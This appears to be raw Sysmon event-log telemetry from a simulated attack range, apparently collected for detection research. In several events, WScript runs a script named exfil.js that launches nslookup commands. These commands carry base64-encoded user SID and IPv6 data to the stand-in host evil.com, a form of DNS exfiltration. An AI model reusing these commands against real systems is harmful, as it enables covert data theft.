14:21:26.003{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206828Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.003{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206827Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.003{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18E6-629A-CC42-000000005F02}5384C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000206826Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.003{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206825Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.003{2E1864BB-18E5-629A-CA42-000000005F02}81364336C:\Windows\system32\cmd.exe{2E1864BB-18E6-629A-CC42-000000005F02}5384C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000206824Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.013{2E1864BB-18E6-629A-CC42-000000005F02}5384C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlclNJRDogUy0xLTUtMjEtMjI4ODU1NTg4MC00MjYyODczOTg5LTI1NjQ1NDA1NTgtNTAw evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18E5-629A-CA42-000000005F02}8136C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlclNJRDogUy0xLTUtMjEtMjI4ODU1NTg4MC00MjYyODczOTg5LTI1NjQ1NDA1NTgtNTAw evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlrirvl.tmp 2>&1 354300x8000000000000000206823Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:23.723{00000000-0000-0000-0000-000000000000}7708<unknown process>-udpfalsefalse127.0.0.1-50449-false127.0.0.1-53domain 354300x8000000000000000206822Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:23.565{00000000-0000-0000-0000-000000000000}5352<unknown process>-udpfalsefalse127.0.0.1-50447-false127.0.0.1-53domain 354300x8000000000000000206821Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:23.564{00000000-0000-0000-0000-000000000000}5352<unknown process>-udptruefalse127.0.0.1-50447-false127.0.0.1-53domain 354300x8000000000000000206820Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:23.563{00000000-0000-0000-0000-000000000000}5352<unknown process>-udpfalsefalse127.0.0.1-50446-false127.0.0.1-53domain 354300x8000000000000000206819Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:23.563{00000000-0000-0000-0000-000000000000}5352<unknown process>-udptruefalse127.0.0.1-50446-false127.0.0.1-53domain 354300x8000000000000000206818Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:22.861{00000000-0000-0000-0000-000000000000}3588<unknown process>-udptruefalse127.0.0.1-50444-false127.0.0.1-53domain 10341000x8000000000000000207568Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.994{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207567Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.994{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207566Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.994{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207565Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.994{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207564Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.994{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18E7-629A-1743-000000005F02}2628C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000207563Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.994{2E1864BB-18E7-629A-1543-000000005F02}61488160C:\Windows\system32\cmd.exe{2E1864BB-18E7-629A-1743-000000005F02}2628C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000207562Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.996{2E1864BB-18E7-629A-1743-000000005F02}2628C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A SVB2NjogZmU4MDo6ZmMwMzpjOWUyOmIwNjg6OWY3MQ== evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18E7-629A-1543-000000005F02}6148C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A SVB2NjogZmU4MDo6ZmMwMzpjOWUyOmIwNjg6OWY3MQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nldaos.tmp 2>&1 10341000x8000000000000000207561Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.978{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-18E7-629A-1643-000000005F02}7768C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207560Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.978{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18E7-629A-1643-000000005F02}7768C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207559Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.974{2E1864BB-18E7-629A-1643-000000005F02}77686848C:\Windows\system32\conhost.exe{2E1864BB-18E7-629A-1543-000000005F02}6148C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000207558Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.975{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E45DEAA88D3348094B42F5FFE72AFC6A,SHA256=5B8B6D92A6B69382E04A8A7FDD320B97D2F0279EE62C9B1F535669E91A9839A5,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000207557Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.957{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18E7-629A-1643-000000005F02}7768C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000207556Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.957{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207555Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.957{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207554Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.957{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207553Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.957{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207552Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.957{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18E7-629A-1543-000000005F02}6148C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000207551Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.957{2E1864BB-18E0-629A-6742-000000005F02}3976908C:\Windows\System32\WScript.exe{2E1864BB-18E7-629A-1543-000000005F02}6148C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000207550Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.957{2E1864BB-18E7-629A-1543-000000005F02}6148C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A SVB2NjogZmU4MDo6ZmMwMzpjOWUyOmIwNjg6OWY3MQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nldaos.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000207549Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.941{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlxdi.tmpMD5=E9933BFC1563034EF92711FFD1FA59E4,SHA256=B289486696E542D49274648AF69BCDC051FA9206A6157EC32F57F8442A56EBEC,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000207548Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.926{2E1864BB-18E7-629A-1343-000000005F02}60443548C:\Windows\system32\conhost.exe{2E1864BB-18E7-629A-1443-000000005F02}7036C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207547Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.926{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207546Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.926{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207545Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 